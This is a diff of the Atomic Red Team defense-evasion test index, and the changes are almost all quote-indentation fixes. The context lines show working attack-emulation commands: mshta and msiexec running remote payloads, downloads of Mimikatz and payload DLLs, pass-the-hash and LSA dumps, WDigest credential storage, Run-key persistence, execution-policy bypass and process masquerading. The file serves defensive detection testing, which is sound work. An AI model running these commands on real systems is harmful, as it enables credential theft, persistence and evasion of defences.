         Visual Basic example file (vb.xml) will simply print "Hello from a Visual
         Basic inline task!" to the screen.
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -27996,10 +27996,10 @@ defense-evasion:
       dependencies:
       - description: 'Project file must exist on disk at specified location (#{filename})
 
-          '
+'
         prereq_command: 'if (Test-Path #{filename}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           New-Item -Type Directory (split-path #{filename}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127.001/src/vb.xml" -OutFile "#{filename}"
@@ -28122,7 +28122,7 @@ defense-evasion:
         Red Team repo, and mount the image. The provided sample ISO simply has a Reports
         shortcut file in it. Reference: https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -28134,20 +28134,20 @@ defense-evasion:
       dependencies:
       - description: 'T1553.005.iso must exist on disk at specified location (#{path_of_iso})
 
-          '
+'
         prereq_command: 'if (Test-Path #{path_of_iso}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/T1553.005.iso -OutFile "#{path_of_iso}"
       executor:
         command: 'Mount-DiskImage -ImagePath "#{path_of_iso}"
 
-          '
+'
         cleanup_command: 'Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null
 
-          '
+'
         name: powershell
     - name: Mount an ISO image and run executable from the ISO
       auto_generated_guid: 42f22b00-0242-4afc-a61b-0da05041f9cc
@@ -28169,10 +28169,10 @@ defense-evasion:
       dependencies:
       - description: 'FeelTheBurn.iso must exist on disk at specified location (#{path_of_iso})
 
-          '
+'
         prereq_command: 'if (Test-Path #{path_of_iso}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/FeelTheBurn.iso -OutFile "#{path_of_iso}"
@@ -28259,7 +28259,7 @@ defense-evasion:
           schtasks /query /tn win32times
         cleanup_command: 'schtasks /tn win32times /delete /f
 
-          '
+'
         name: command_prompt
         elevation_required: true
     - name: Creating W32Time similar named service using sc
@@ -28274,7 +28274,7 @@ defense-evasion:
           sc qc win32times
         cleanup_command: 'sc delete win32times
 
-          '
+'
         name: command_prompt
         elevation_required: true
   T1036:
@@ -28424,7 +28424,7 @@ defense-evasion:
       description: 'Create and execute a process from a directory masquerading as
         the current parent directory (`...` instead of normal `..`)
 
-        '
+'
       supported_platforms:
       - macos
       - linux
@@ -28673,11 +28673,11 @@ defense-evasion:
         command: 'reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
           /t REG_DWORD /v HideFileExt /d 1 /f
 
-          '
+'
         cleanup_command: 'reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
           /v HideFileExt /f >nul 2>&1
 
-          '
+'
         name: command_prompt
         elevation_required: true
     - name: Modify Registry of Local Machine - cmd
@@ -28697,11 +28697,11 @@ defense-evasion:
         command: 'reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
           /t REG_EXPAND_SZ /v SecurityHealth /d #{new_executable} /f
 
-          '
+'
         cleanup_command: 'reg delete HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
           /v SecurityHealth /f >nul 2>&1
 
-          '
+'
         name: command_prompt
         elevation_required: true
     - name: Modify registry to store logon credentials
@@ -28716,11 +28716,11 @@ defense-evasion:
         command: 'reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
           /v UseLogonCredential /t REG_DWORD /d 1 /f
 
-          '
+'
         cleanup_command: 'reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
           /v UseLogonCredential /t REG_DWORD /d 0 /f >nul 2>&1
 
-          '
+'
         name: command_prompt
         elevation_required: true
     - name: Add domain to Trusted sites Zone
@@ -28761,11 +28761,11 @@ defense-evasion:
         command: 'New-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet
           Settings" -Name T1112 -Value "<script>"
 
-          '
+'
         cleanup_command: 'Remove-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet
           Settings" -Name T1112 -ErrorAction Ignore
 
-          '
+'
         name: powershell
     - name: Change Powershell Execution Policy to Bypass
       auto_generated_guid: f3a6cceb-06c9-48e5-8df8-8867a6814245
@@ -28782,11 +28782,11 @@ defense-evasion:
       executor:
         command: 'Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope LocalMachine
 
-          '
+'
         cleanup_command: 'Set-ExecutionPolicy -ExecutionPolicy #{default_execution_policy}
           -Scope LocalMachine
 
-          '
+'
         name: powershell
   T1601:
     technique:
@@ -28937,7 +28937,7 @@ defense-evasion:
       description: 'Test execution of a remote script using mshta.exe. Upon execution
         calc.exe will be launched.
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -28948,7 +28948,7 @@ defense-evasion:
       executor:
         command: 'mshta.exe javascript:a=(GetObject(''script:#{file_url}'')).Exec();close();
 
-          '
+'
         name: command_prompt
     - name: Mshta executes VBScript to execute malicious command
       auto_generated_guid: 906865c3-e05f-4acc-85c4-fbc185455095
@@ -28962,14 +28962,14 @@ defense-evasion:
         command: 'mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell
           -noexit -file PathToAtomicsFolder\T1218.005\src\powershell.ps1"":close")
 
-          '
+'
         name: command_prompt
     - name: Mshta Executes Remote HTML Application (HTA)
       auto_generated_guid: c4b97eeb-5249-4455-a607-59f95485cb45
       description: 'Execute an arbitrary remote HTA. Upon execution calc.exe will
         be launched.
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -28988,7 +28988,7 @@ defense-evasion:
           mshta "#{temp_file}"
         cleanup_command: 'remove-item "#{temp_file}" -ErrorAction Ignore
 
-          '
+'
         name: powershell
     - name: Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral
         Movement
@@ -29020,7 +29020,7 @@ defense-evasion:
         get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
           -Force
 
-          '
+'
       executor:
         command: 'Invoke-ATHHTMLApplication -HTAFilePath #{hta_file_path} -ScriptEngine
           #{script_engine} -AsLocalUNCPath -SimulateLateralMovement -MSHTAFilePath
@@ -29051,7 +29051,7 @@ defense-evasion:
         get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
           -Force
 
-          '
+'
       executor:
         command: 'Invoke-ATHHTMLApplication -HTAFilePath #{hta_file_path} -ScriptEngine
           #{script_engine} -SimulateUserDoubleClick'
@@ -29081,7 +29081,7 @@ defense-evasion:
         get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
           -Force
 
-          '
+'
       executor:
         command: 'Invoke-ATHHTMLApplication -HTAUri #{hta_uri} -MSHTAFilePath #{mshta_file_path}'
         name: powershell
@@ -29115,7 +29115,7 @@ defense-evasion:
         get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
           -Force
 
-          '
+'
       executor:
         command: 'Invoke-ATHHTMLApplication -ScriptEngine #{script_engine} -InlineProtocolHandler
           #{protocol_handler} -UseRundll32 -Rundll32FilePath #{rundll32_file_path}'
@@ -29149,7 +29149,7 @@ defense-evasion:
         get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
           -Force
 
-          '
+'
       executor:
         command: 'Invoke-ATHHTMLApplication -ScriptEngine #{script_engine} -InlineProtocolHandler
           #{protocol_handler} -MSHTAFilePath #{mshta_file_path}'
@@ -29175,7 +29175,7 @@ defense-evasion:
         get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
           -Force
 
-          '
+'
       executor:
         command: 'Invoke-ATHHTMLApplication -TemplatePE -AsLocalUNCPath -MSHTAFilePath
           #{mshta_file_path}'
@@ -29185,7 +29185,7 @@ defense-evasion:
       description: 'Use Mshta to execute arbitrary PowerShell. Example is from the
         2021 Threat Detection Report by Red Canary.
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -29200,7 +29200,7 @@ defense-evasion:
       executor:
         command: 'mshta.exe "about:<hta:application><script language="VBScript">Close(Execute("CreateObject(""Wscript.Shell"").Run%20""powershell.exe%20-nop%20-Command%20Write-Host%20#{message};Start-Sleep%20-Seconds%20#{seconds_to_sleep}"""))</script>''"
 
-          '
+'
         name: command_prompt
   T1218.007:
     technique:
@@ -29267,7 +29267,7 @@ defense-evasion:
       description: 'Execute arbitrary MSI file. Commonly seen in application installation.
         The MSI opens notepad.exe when sucessfully executed.
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -29279,17 +29279,17 @@ defense-evasion:
       dependencies:
       - description: 'T1218.msi must exist on disk at specified location (#{msi_payload})
 
-          '
+'
         prereq_command: 'if (Test-Path #{msi_payload}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: 'Write-Host "You must provide your own MSI"
 
-          '
+'
       executor:
         command: 'msiexec.exe /q /i "#{msi_payload}"
 
-          '
+'
         name: command_prompt
     - name: Msiexec.exe - Execute Remote MSI file
       auto_generated_guid: bde7d2fe-d049-458d-a362-abda32a7e649
@@ -29297,7 +29297,7 @@ defense-evasion:
         in application installation, commonly seen in malware execution. The MSI opens
         notepad.exe when sucessfully executed.
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -29308,7 +29308,7 @@ defense-evasion:
       executor:
         command: 'msiexec.exe /q /i "#{msi_payload}"
 
-          '
+'
         name: command_prompt
     - name: Msiexec.exe - Execute Arbitrary DLL
       auto_generated_guid: 66f64bd5-7c35-4c24-953a-04ca30a0a0ec
@@ -29327,17 +29327,17 @@ defense-evasion:
       dependencies:
       - description: 'T1218.dll must exist on disk at specified location (#{dll_payload})
 
-          '
+'
         prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/src/x64/T1218.dll" -OutFile "#{dll_payload}"
       executor:
         command: 'msiexec.exe /y "#{dll_payload}"
 
-          '
+'
         name: command_prompt
   T1564.004:
     technique:
@@ -29477,7 +29477,7 @@ defense-evasion:
           Start-Process -FilePath "$env:comspec" -ArgumentList "/c,type,#{payload_path},>,`"#{ads_file_path}:#{ads_name}`""
         cleanup_command: 'Remove-Item "#{ads_file_path}" -Force -ErrorAction Ignore
 
-          '
+'
         name: powershell
     - name: Create ADS command prompt
       auto_generated_guid: 17e7637a-ddaf-4a82-8622-377e20de8fdb
@@ -29501,7 +29501,7 @@ defense-evasion:
           for /f "usebackq delims=?" %i in (#{file_name}:#{ads_filename}) do %i
         cleanup_command: 'del #{file_name} >nul 2>&1
 
-          '
+'
         name: command_prompt
     - name: Create ADS PowerShell
       auto_generated_guid: 0045ea16-ed3c-4d4c-a9ee-15e44d1560d1
@@ -29523,13 +29523,13 @@ defense-evasion:
       dependencies:
       - description: 'The file must exist on disk at specified location (#{file_name})
 
-          '
+'
         prereq_command: 'if (Test-Path #{file_name}) { exit 0 } else { exit 1 }
 
-          '
+'
         get_prereq_command: 'New-Item -Path #{file_name} | Out-Null
 
-          '
+'
       executor:
         command: |
           echo "test" > #{file_name} | set-content -path test.txt -stream #{ads_filename} -value "test"
@@ -29537,7 +29537,7 @@ defense-evasion:
           set-content -path . -stream #{ads_filename} -value "test3"
         cleanup_command: 'Remove-Item -Path #{file_name} -ErrorAction Ignore
 
-          '
+'
         name: powershell
   T1599.001:
     technique:
@@ -29746,7 +29746,7 @@ defense-evasion:
       auto_generated_guid: 14c38f32-6509-46d8-ab43-d53e32d2b131
       description: 'Add a Network Share utilizing the command_prompt
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -29763,7 +29763,7 @@ defense-evasion:
       auto_generated_guid: '09210ad5-1ef2-4077-9ad3-7351e13e9222'
       description: 'Removes a Network Share utilizing the command_prompt
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -29774,13 +29774,13 @@ defense-evasion:
       executor:
         command: 'net share #{share_name} /delete
 
-          '
+'
         name: command_prompt
     - name: Remove Network Share PowerShell
       auto_generated_guid: 0512d214-9512-4d22-bde7-f37e058259b3
       description: 'Removes a Network Share utilizing PowerShell
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -29990,14 +29990,14 @@ defense-evasion:
         cleanup_command: 'Remove-ItemProperty -Force -ErrorAction Ignore -Path #{registry_key_storage}
           -Name #{registry_entry_storage}
 
-          '
+'
         name: powershell
     - name: Execution from Compressed File
       auto_generated_guid: f8c8a909-5f29-49ac-9244-413936ce6d1f
       description: 'Mimic execution of compressed executable. When successfully executed,
         calculator.exe will open.
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -30009,11 +30009,11 @@ defense-evasion:
       dependencies:
       - description: 'T1027.exe must exist on disk at $env:temp\temp_T1027.zip\T1027.exe
 
-          '
+'
         prereq_command: 'if (Test-Path $env:temp\temp_T1027.zip\T1027.exe) {exit 0}
           else {exit 1}
 
-          '
+'
         get_prereq_command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
           Invoke-WebRequest "#{url_path}" -OutFile "$env:temp\T1027.zip"
@@ -30021,7 +30021,7 @@ defense-evasion:
       executor:
         command: '"%temp%\temp_T1027.zip\T1027.exe"
 
-          '
+'
         cleanup_command: |
           taskkill /f /im calculator.exe >nul 2>nul
           rmdir /S /Q %temp%\temp_T1027.zip >nul 2>nul
@@ -30055,7 +30055,7 @@ defense-evasion:
         command: 'Send-MailMessage -From #{sender} -To #{receiver} -Subject ''T1027_Atomic_Test''
           -Attachments #{input_file} -SmtpServer #{smtp_server}
 
-          '
+'
         name: powershell
     - name: DLP Evasion via Sensitive Data in VBA Macro over HTTP
       auto_generated_guid: e2d85e66-cb66-4ed7-93b1-833fc56c9319
@@ -30076,7 +30076,7 @@ defense-evasion:
       executor:
         command: 'Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file}
 
-          '
+'
         name: powershell
     - name: Obfuscated Command in PowerShell
       auto_generated_guid: 8b3f4ed6-077b-4bdd-891c-2d237f19410f
@@ -30084,7 +30084,7 @@ defense-evasion:
         "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report
         by Red Canary.
 
-        '
+'
       supported_platforms:
       - windows
       executor:
@@ -30095,7 +30095,7 @@ defense-evasion:
           120, 157 ,167,145 , 162 ,123,150 ,145 , 154 , 154 , 41,47)| .(''%'') { (
           [CHAR] (  $Pz2sB0::"t`OinT`16"(( [sTring]${_}) ,8)))})) )
 
-          '
+'
         name: powershell
   T1218.008:
     technique:
@@ -30166,7 +30166,7 @@ defense-evasion:
       auto_generated_guid: 2430498b-06c0-4b92-a448-8ad263c388e2
       description: 'Execute arbitrary DLL file stored locally.
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -30178,17 +30178,17 @@ defense-evasion:
       dependencies:
       - description: 'T1218-2.dll must exist on disk at specified location (#{dll_payload})
 
-          '
+'
         prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.008/src/Win32/T1218-2.dll" -OutFile "#{dll_payload}"
       executor:
         command: 'odbcconf.exe /S /A {REGSVR "#{dll_payload}"}
 
-          '
+'
         name: command_prompt
   T1134.004:
     technique:
@@ -30301,10 +30301,10 @@ defense-evasion:
       dependencies:
       - description: 'DLL to inject must exist on disk at specified location (#{dll_path})
 
-          '
+'
         prereq_command: 'if (Test-Path #{dll_path}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           New-Item -Type Directory (split-path #{dll_path}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1134.004/bin/calc.dll" -OutFile "#{dll_path}"
@@ -30345,7 +30345,7 @@ defense-evasion:
         get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
           -Force
 
-          '
+'
       executor:
         command: 'Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine
           ''#{command_line}'' -ParentId #{parent_pid}'
@@ -30374,7 +30374,7 @@ defense-evasion:
         get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
           -Force
 
-          '
+'
       executor:
         command: 'Start-ATHProcessUnderSpecificParent  -ParentId #{parent_pid} -TestGuid
           #{test_guid}'
@@ -30404,7 +30404,7 @@ defense-evasion:
         get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
           -Force
 
-          '
+'
       executor:
         command: 'Get-CimInstance -ClassName Win32_Process -Property Name, CommandLine,
           ProcessId -Filter "Name = ''svchost.exe'' AND CommandLine LIKE ''%''" |
@@ -30440,7 +30440,7 @@ defense-evasion:
         get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
           -Force
 
-          '
+'
       executor:
         command: 'Start-Process -FilePath #{parent_name} -PassThru | Start-ATHProcessUnderSpecificParent
           -FilePath #{file_path} -CommandLine ''#{command_line}'''
@@ -30525,7 +30525,7 @@ defense-evasion:
       - description: 'Mimikatz executor must exist on disk and at specified location
           (#{mimikatz_path})
 
-          '
+'
         prereq_command: |
           $mimikatz_path = cmd /c echo #{mimikatz_path}
           if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
@@ -30539,13 +30539,13 @@ defense-evasion:
         command: '#{mimikatz_path} "sekurlsa::pth /user:#{user_name} /domain:#{domain}
           /ntlm:#{ntlm}"
 
-          '
+'
         name: command_prompt
     - name: crackmapexec Pass the Hash
       auto_generated_guid: eb05b028-16c8-4ad8-adea-6f5b219da9a9
       description: 'command execute with crackmapexec
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -30574,18 +30574,18 @@ defense-evasion:
       - description: 'CrackMapExec executor must exist on disk at specified location
           (#{crackmapexec_exe})
 
-          '
+'
         prereq_command: 'if(Test-Path #{crackmapexec_exe}) { 0 } else { -1 }
 
-          '
+'
         get_prereq_command: 'Write-Host Automated installer not implemented yet, please
           install crackmapexec manually at this location: #{crackmapexec_exe}
 
-          '
+'
       executor:
         command: 'crackmapexec #{domain} -u #{user_name} -H #{ntlm} -x #{command}
 
-          '
+'
         name: command_prompt
   T1550.003:
     technique:
@@ -30664,7 +30664,7 @@ defense-evasion:
       auto_generated_guid: dbf38128-7ba7-4776-bedf-cc2eed432098
       description: 'Similar to PTH, but attacking Kerberos
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -30684,10 +30684,10 @@ defense-evasion:
       dependencies:
       - description: 'Mimikatz must exist on disk at specified location (#{mimikatz_exe})
 
-          '
+'
         prereq_command: 'if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
           Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\Mimi.zip"
@@ -30765,7 +30765,7 @@ defense-evasion:
       description: 'Uses PowerShell to install and register a password filter DLL.
         Requires a reboot and administrative privileges.
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -30778,14 +30778,14 @@ defense-evasion:
       - description: 'AtomicPasswordFilter.dll must exist on disk at specified location
           (#{input_dll})
 
-          '
+'
         prereq_command: 'if (Test-Path #{input_dll}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: 'Write-Host "You must provide your own password filter
           dll"
 
-          '
+'
       executor:
         command: |
           $passwordFilterName = (Copy-Item "#{input_dll}" -Destination "C:\Windows\System32" -PassThru).basename
@@ -31616,13 +31616,13 @@ defense-evasion:
         cleanup_command: 'Stop-Process -Name "#{spawnto_process_name}" -ErrorAction
           Ignore
 
-          '
+'
         name: powershell
     - name: RunPE via VBA
       auto_generated_guid: 3ad4a037-1598-4136-837c-4027e4fa319b
       description: 'This module executes notepad.exe from within the WINWORD.EXE process
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -31634,7 +31634,7 @@ defense-evasion:
       dependencies:
       - description: 'Microsoft #{ms_product} must be installed
 
-          '
+'
         prereq_command: |
           try {
             New-Object -COMObject "#{ms_product}.Application" | Out-Null
@@ -31645,7 +31645,7 @@ defense-evasion:
         get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
           manually to meet this requirement"
 
-          '
+'
       executor:
         command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX
           (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\"
@@ -31768,7 +31768,7 @@ defense-evasion:
       dependencies:
       - description: 'The 64-bit version of Microsoft Office must be installed
 
-          '
+'
         prereq_command: |
           try {
             $wdApp = New-Object -COMObject "Word.Application"
@@ -31779,7 +31779,7 @@ defense-evasion:
         get_prereq_command: 'Write-Host "You will need to install Microsoft Word (64-bit)
           manually to meet this requirement"
 
-          '
+'
       executor:
         command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -31814,7 +31814,7 @@ defense-evasion:
       - description: 'Mimikatz executor must exist on disk and at specified location
           (#{mimikatz_path})
 
-          '
+'
         prereq_command: |
           $mimikatz_path = cmd /c echo #{mimikatz_path}
           if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
@@ -31828,10 +31828,10 @@ defense-evasion:
       - description: 'PsExec tool from Sysinternals must exist on disk at specified
           location (#{psexec_path})
 
-          '
+'
         prereq_command: 'if (Test-Path "#{psexec_path}") { exit 0} else { exit 1}
 
-          '
+'
         get_prereq_command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
           Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
@@ -31842,7 +31842,7 @@ defense-evasion:
         command: '#{psexec_path} /accepteula \\#{machine} -c #{mimikatz_path} "lsadump::lsa
           /inject /id:500" "exit"
 
-          '
+'
         name: command_prompt
         elevation_required: false
   T1055.008:
@@ -31977,7 +31977,7 @@ defense-evasion:
       description: 'Executes the signed PubPrn.vbs script with options to download
         and execute an arbitrary payload.
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -31989,7 +31989,7 @@ defense-evasion:
         command: 'cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs
           localhost "script:#{remote_payload}"
 
-          '
+'
         name: command_prompt
   T1542.004:
     technique:
@@ -32212,7 +32212,7 @@ defense-evasion:
       description: 'Executes the Uninstall Method, No Admin Rights Required. Upon
         execution, "I shouldn''t really execute either." will be displayed.
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -32229,10 +32229,10 @@ defense-evasion:
       - description: 'The CSharp source file must exist on disk at specified location
           (#{source_file})
 
-          '
+'
         prereq_command: 'if (Test-Path #{source_file}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           New-Item -Type Directory (split-path #{source_file}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.009/src/T1218.009.cs" -OutFile "#{source_file}"
@@ -32242,7 +32242,7 @@ defense-evasion:
           C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U #{output_file}
         cleanup_command: 'del #{output_file} >nul 2>&1
 
-          '
+'
         name: command_prompt
     - name: Regsvcs Uninstall Method Call Test
       auto_generated_guid: fd3c1c6a-02d2-4b72-82d9-71c527abb126
@@ -32265,10 +32265,10 @@ defense-evasion:
       - description: 'The CSharp source file must exist on disk at specified location
           (#{source_file})
 
-          '
+'
         prereq_command: 'if (Test-Path #{source_file}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           New-Item -Type Directory (split-path #{source_file}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.009/src/T1218.009.cs" -OutFile "#{source_file}"
@@ -32357,7 +32357,7 @@ defense-evasion:
       description: 'Regsvr32.exe is a command-line program used to register and unregister
         OLE controls. Upon execution, calc.exe will be launched.
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -32377,10 +32377,10 @@ defense-evasion:
       dependencies:
       - description: 'Regsvr32.sct must exist on disk at specified location (#{filename})
 
-          '
+'
         prereq_command: 'if (Test-Path #{filename}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           New-Item -Type Directory (split-path #{filename}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/src/RegSvr32.sct" -OutFile "#{filename}"
@@ -32415,7 +32415,7 @@ defense-evasion:
       description: 'Regsvr32.exe is a command-line program used to register and unregister
         OLE controls. Upon execution, calc.exe will be launched.
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -32436,10 +32436,10 @@ defense-evasion:
       - description: 'AllTheThingsx86.dll must exist on disk at specified location
           (#{dll_name})
 
-          '
+'
         prereq_command: 'if (Test-Path #{dll_name}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           New-Item -Type Directory (split-path #{dll_name}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/bin/AllTheThingsx86.dll" -OutFile "#{dll_name}"
@@ -32447,14 +32447,14 @@ defense-evasion:
         command: 'IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe
           /s #{dll_name}) ELSE ( #{regsvr32path}\#{regsvr32name} /s #{dll_name} )
 
-          '
+'
         name: command_prompt
     - name: Regsvr32 Registering Non DLL
       auto_generated_guid: 1ae5ea1f-0a4e-4e54-b2f5-4ac328a7f421
       description: 'Replicating observed Gozi maldoc behavior registering a dll with
         an altered extension
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -32474,13 +32474,13 @@ defense-evasion:
       dependencies:
       - description: 'Test requires a renamed dll file
 
-          '
+'
         prereq_command: 'if exist #{dll_file} ( exit 0 ) else ( exit 1 )
 
-          '
+'
         get_prereq_command: 'copy "C:\Windows\System32\shell32.dll" "#{dll_file}"
 
-          '
+'
       executor:
         name: command_prompt
         elevation_required: false
@@ -32596,7 +32596,7 @@ defense-evasion:
           %SystemRoot%\Temp\lsass.exe /B
         cleanup_command: 'del /Q /F %SystemRoot%\Temp\lsass.exe >nul 2>&1
 
-          '
+'
         name: command_prompt
     - name: Masquerading as Linux crond process.
       auto_generated_guid: a315bfff-7a98-403b-b442-2ea1b255e556
@@ -32612,7 +32612,7 @@ defense-evasion:
           /tmp/crond
         cleanup_command: 'rm /tmp/crond
 
-          '
+'
         name: sh
     - name: Masquerading - cscript.exe running as notepad.exe
       auto_generated_guid: 3a2a578b-0a01-46e4-92e3-62e2859b42f0
@@ -32628,7 +32628,7 @@ defense-evasion:
           cmd.exe /c %APPDATA%\notepad.exe /B
         cleanup_command: 'del /Q /F %APPDATA%\notepad.exe >nul 2>&1
 
-          '
+'
         name: command_prompt
     - name: Masquerading - wscript.exe running as svchost.exe
       auto_generated_guid: 24136435-c91a-4ede-9da1-8b284a1c1a23
@@ -32644,7 +32644,7 @@ defense-evasion:
           cmd.exe /c %APPDATA%\svchost.exe /B
         cleanup_command: 'del /Q /F %APPDATA%\svchost.exe >nul 2>&1
 
-          '
+'
         name: command_prompt
     - name: Masquerading - powershell.exe running as taskhostw.exe
       auto_generated_guid: ac9d0fc3-8aa8-4ab5-b11f-682cd63b40aa
@@ -32660,7 +32660,7 @@ defense-evasion:
           cmd.exe /K %APPDATA%\taskhostw.exe
         cleanup_command: 'del /Q /F %APPDATA%\taskhostw.exe >nul 2>&1
 
-          '
+'
         name: command_prompt
     - name: Masquerading - non-windows exe running as windows exe
       auto_generated_guid: bc15c13f-d121-4b1f-8c7d-28d95854d086
@@ -32683,10 +32683,10 @@ defense-evasion:
       dependencies:
       - description: 'Exe file to copy must exist on disk at specified location (#{inputfile})
 
-          '
+'
         prereq_command: 'if (Test-Path #{inputfile}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           New-Item -Type Directory (split-path #{inputfile}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.003/bin/T1036.003.exe" -OutFile "#{inputfile}"
@@ -32697,14 +32697,14 @@ defense-evasion:
           Stop-Process -ID $myT1036_003
         cleanup_command: 'Remove-Item #{outputfile} -Force -ErrorAction Ignore
 
-          '
+'
         name: powershell
     - name: Masquerading - windows exe running as different windows exe
       auto_generated_guid: c3d24a39-2bfe-4c6a-b064-90cd73896cb0
       description: 'Copies a windows exe, renames it as another windows exe, and launches
         it to masquerade as second windows exe
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
